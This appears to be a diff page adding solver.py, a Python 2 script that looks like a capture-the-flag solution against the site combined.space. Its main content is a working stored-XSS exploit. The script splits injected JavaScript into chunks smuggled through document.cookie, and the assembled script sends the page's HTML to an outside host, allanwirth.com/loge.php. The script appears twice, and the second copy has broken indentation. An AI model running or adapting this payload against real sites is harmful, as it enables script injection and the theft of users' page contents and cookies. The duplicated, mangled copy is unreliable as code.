allanlw · February 27, 2017 02:13
diff --git a/solver.py b/solver.py
 #!/usr/bin/python

 import urllib2
 import string
 import random
 import urllib
 import cgi

 l = list(string.ascii_letters)
 random.shuffle(l)

 name = "".join(l)[0:10].lower()

 a = urllib2.urlopen("http://combined.space/", "name="+name).read()

 nonce = a.split("_")[1]
 nonce = nonce.split(".")[0]
 domain = "http://" + name + "_" + nonce + ".combined.space/"

 print domain

 script = "--><script>"
 script += "(xhr=new XMLHttpRequest(), console.log(xhr), xhr.open('GET', 'http://allanwirth.com/loge.php?id='+encodeURI(document.body.innerHTML.slice(-512)), true), xhr.send(null))"
 script += "</script><--"

 if len(script) % 8 != 0:
  script += (8 - len(script) % 8) * " "

 script += "; domain=.combined.space"

 print len(script)% 8

 assert len(script)%8 == 0

 from itertools import izip_longest

 def grouper(iterable, n, fillvalue=None):
    args = [iter(iterable)] * n
    return izip_longest(*args, fillvalue=fillvalue)

 payloads = [
  ('<script>a="";</script>', "foo"),
  ('<script>document.cookie="f="+a</script>', "foo"),
  ('<script>console.log(a);</script>', 'foo'),
  ('<script>console.log(document.cookie);</script>', 'fuck'),
 ]

 for chunk in reversed(list(grouper(script, 8, ";"))):
  k = "".join(chunk).replace("<", "\\x3C").replace(">", "\\x3E").replace('"', "\x22")
  payloads.insert(1, ('<script>a+="' + k + '";</script>', "foo"))


 for name,body in payloads:
 urllib2.urlopen(domain, "name="+urllib.quote(name)+"&post="+urllib.quote(body)).read()
	#!/usr/bin/python

	import urllib2
	import string
	import random
	import urllib
	import cgi

	l = list(string.ascii_letters)
	random.shuffle(l)

	name = "".join(l)[0:10].lower()

	a = urllib2.urlopen("http://combined.space/", "name="+name).read()

	nonce = a.split("_")[1]
	nonce = nonce.split(".")[0]
	domain = "http://" + name + "_" + nonce + ".combined.space/"

	print domain

	script = "--><script>"
	script += "(xhr=new XMLHttpRequest(), console.log(xhr), xhr.open('GET', 'http://allanwirth.com/loge.php?id='+encodeURI(document.body.innerHTML.slice(-512)), true), xhr.send(null))"
	script += "</script><--"

	if len(script) % 8 != 0:
	script += (8 - len(script) % 8) * " "

	script += "; domain=.combined.space"

	print len(script)% 8

	assert len(script)%8 == 0

	from itertools import izip_longest

	def grouper(iterable, n, fillvalue=None):
	args = [iter(iterable)] * n
	return izip_longest(*args, fillvalue=fillvalue)

	payloads = [
	('<script>a="";</script>', "foo"),
	('<script>document.cookie="f="+a</script>', "foo"),
	('<script>console.log(a);</script>', 'foo'),
	('<script>console.log(document.cookie);</script>', 'fuck'),
	]

	for chunk in reversed(list(grouper(script, 8, ";"))):
	k = "".join(chunk).replace("<", "\\x3C").replace(">", "\\x3E").replace('"', "\x22")
	payloads.insert(1, ('<script>a+="' + k + '";</script>', "foo"))


	for name,body in payloads:
	urllib2.urlopen(domain, "name="+urllib.quote(name)+"&post="+urllib.quote(body)).read()